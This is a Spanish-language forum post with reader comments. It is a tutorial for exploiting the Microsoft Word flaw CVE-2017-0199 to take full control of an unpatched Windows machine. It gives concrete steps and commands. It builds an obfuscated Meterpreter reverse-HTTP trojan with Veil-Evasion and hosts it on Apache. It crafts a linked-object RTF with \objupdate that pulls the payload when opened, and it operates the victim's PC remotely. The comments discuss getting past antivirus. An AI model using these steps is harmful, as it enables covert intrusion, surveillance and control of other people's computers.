Estamos migrando de sistemas de foros, por favor repórtanos cualquier problema a [email protected], si te llega a tu bandeja de entrada o a spam un correo que te dice que se solicitó el cambio de contraseña, no te alarmes, es un procedimiento normal de la migración, cambia tu contraseña porque no hay compatibilidad en el sistema de cifrado del viejo sistema con el sistema nuevo, por eso debes resetear tu clave con ese enlace.

Explotando el "0day" de Microsoft Word (CVE-2017-0199) para Hackear un Windows

Les recuerdo que el CVE-2017-0199 nació como un 0-day que explotaba las últimas versiones de Microsoft Office, concretamente un RTF que se vio inicialmente en un manual militar en ruso con objetivos en la República de Donestk y que comprometía el PC de la víctima con sólo abrirlo (permitía RCE).

En este tutorial les enseñare a infectar cualquier maquina Windows que tenga Microsoft Word y que no tenga parcheado el fallo CVE-2017-0199, la idea es poder visualizar la vulnerabilidad de ejecución de código remoto en la máquina, simplemente abriendo el documento de Word y tener acceso total a la máquina.

  • Se necesita una maquina KALI Linux
  • Se necesita veil-evasion es un programa para ofuscar troyanos (Veil-Evasion (sudo apt-get veil-evasion): Ofuscará el troyano y el rango de detección de antivirus se reducirá bastante. Análisis del troyano: http://pscan.xyz/results.php?id=HIYaZTBZPUsjuGwi)
  • Se necesita htattack https://github.com/xavialvarez/htattack/ (agradecimientos a Xavi Álvarez por la herramienta y la guía) es un programa realizado en Python el cual se va a utilizar para iniciar el servidor que enviara las peticiones maliciosas al documento y el documento lo va a ejecutar dentro del proceso de WORD el cual tiene permisos administrativos y nos va a dar acceso total a la maquina
  • Se necesita Microsoft Word para poder crear los documentos
  • Se necesita la máquina de la víctima la cual es la que se va a infectar con el documento

Se comienza con el terminal de la maquina kali el cual vamos a levantar el servidor apache así: service apache2 start

Ya el servidor apache está corriendo en el en document root --- cd /var/www/html

Ya hay debemos ingresar 2 archivos


    1. Un documento cualquiera, creemos el documento con nano documento.doc Cuando nos abra el editor de texto vamos a poner cualquier palabra en este caso yo puse prueba. Se guarda con control + O y se cierra con control+X


    1. Lo segundo que debemos crear es el troyano ofuscado con el veil-evasion, debemos instalar el veil-evasion así: sudo apt-get install veil-evasion en este caso ya lo tengo instalado y lo inicio de la siguiente manera.

Nos van aparecer 51 payloads (en esta versión que tengo instalada)

El que vamos a utilizar es el phyton/meterpreter/rev_http como lo buscamos solo listamos y es el 30 con el comando list
La idea de utilizar el phyton/meterpreter/rev_http es que cuando lo ofuscamos es muy difícil de detectar y nos va a proporcionar un meterpreter

Lo usamos con el comando use 30


  • Nos aparecen una serie de opciones y lo que debemos poner es el LHOST y el puerto donde queramos hacer que nos mande las conexiones inversas del documento lo dejamos por defecto el 8080
  • De ahí debemos colocar la ip de nuestro pc con el comando set LHOST 192.xxx.xxx.xxx
  • Luego es necesario poner el PYHERYON y lo debemos poner en yes así: set use PYHERION Y
  • Porque así se ofuscará el troyano luego generamos el troyano con generate
  • Cuando lo generamos nos va a solicitar un nombre como lo queramos llamar.

Luego de poner el nombre debemos dejar por defecto en el pin installer 1, lo que se hace es ofuscar el meterpreter para que el Windows defender no lo detecte

tenemos que poner el metertepreter http (30) ya que se está presentando inconvenientes con el windows defender esta tumbando la conexión al servidor. con varios metrerpreter que se intentó, pero no se ejecutó de manera correcta

Luego lo que debemos hacer después de haber creado el payload es moverlo a la carpeta de apache con el comando del servidor web para que se pueda descargar el usuario víctima se mueve así.

  • Primero vamos donde está el archivo: cd /var/lib/veil-evasion/output
  • Luego nos ubicamos en compiled : cd compiled
  • Luego movemos el troyano a la ruta: mv payload3.exe /var/www/payload3.exe

Vamos a crear el archivo malicioso en este caso nos toca en un equipo que tenga WORD, antes de créalo debemos tener el servidor apache ejecutándose

  1. Damos click crear objeto
  2. Vamos a crear desde un archivo
  3. Vamos a colocar el nombre del archivo en este caso del servidor http://192.168.1.12/documento.doc
  4. importante seleccionar vincular este archivo
  5. vamos a aceptar

Automáticamente se crea el archivo que nosotros creamos prueba (nos comunicamos con el servidor remoto), este archivo no tiene nada malicioso, IMPORTANTE debemos guardar el archivo como RTF

  • Luego abrimos el archivo con un editor de texto, en este caso lo vamos abrir con el bloc de notas vamos a ir a buscar y colocamos la palabra obj
  • Click derecho abrir con Bloc de notas, luego vamos a buscar la palabra obj luego de encontrar la palabra debemos anexar con barra \objupdate\, esto es agregar una propiedad más a obligar a los objetos a refrescarse y como nuestro objeto es remoto tendrá que comunicarse obligatoriamente con nuestro servidor.

Ahora si tenemos nuestro documento infectado listo para enviar a nuestra victima

  • Debemos ahora para el apache así: service apache2 stop
  • Comenzamos iniciando el handler que es el que escucha y genera las peticiones
  • Iniciamos el servidor para poder recibir y enviar las respuestas maliciosas

Les recuerdo que el hattack lo tengo en mi escritorio (link en la parte superior) esta escuchado las peticiones

Luego debemos abrir a la carpeta del veil-levasion donde esta creado nuestro troyano con esto habilitamos el handler y los mensajes constantes a la maquina

Ya con esto activo esperamos a que la víctima abra el archivo cuando lo abra le aparece un mensaje, pero el troyano se inyecta mucho antes así el damos que NO ya está infectado

Luego de haber ejecutado e infectado ingresamos a la sesión y quedamos en el pc de la víctima así:

ya finalizando después de haber hecho pruebas como lo es habilitar la cámara, Se ejecutó el comando reboot y automáticamente el pc de la victima de reinicio

Espero les guste °°°°°°°°


Etiquetado como:

Comentarios

  • esta siendo detectado por los antivirus :/

  • editado 12 de mayo

    Si tiene la misma versión de payloads le aparecerán 51, entonces puede intentar con otro que no sea el 30, la mayoría de los antivirus funcionan con firmas (o heurística), hay que tratar de encontrar un payload de esa lista que funcione.

  • si es necesario hacer la practica de la prueba y error

Accede o Regístrate para comentar.